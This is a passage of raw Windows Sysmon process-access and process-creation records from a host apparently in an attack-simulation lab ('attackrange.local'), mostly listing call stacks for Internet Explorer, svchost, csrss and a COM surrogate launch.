RAME.dll+135b29(wow64) 10341000x800000000000000013754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.709{59A5CD1D-8E46-6005-1600-00000000A301}15442272C:\Windows\system32\svchost.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:29.709{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.709{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.709{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:29.678{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.678{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.690{59A5CD1D-9441-6005-2005-00000000A301}7164C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe 
/Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000013733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.615{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9441-6005-1F05-00000000A301}7008C:\Windows\system32\fontdrvhost.exe0x13ffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.615{59A5CD1D-93F6-6005-E704-00000000A301}45725100C:\Windows\system32\winlogon.exe{59A5CD1D-9441-6005-1F05-00000000A301}7008C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+60dea|C:\Windows\system32\winlogon.exe+3508a|C:\Windows\system32\winlogon.exe+1bbfd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
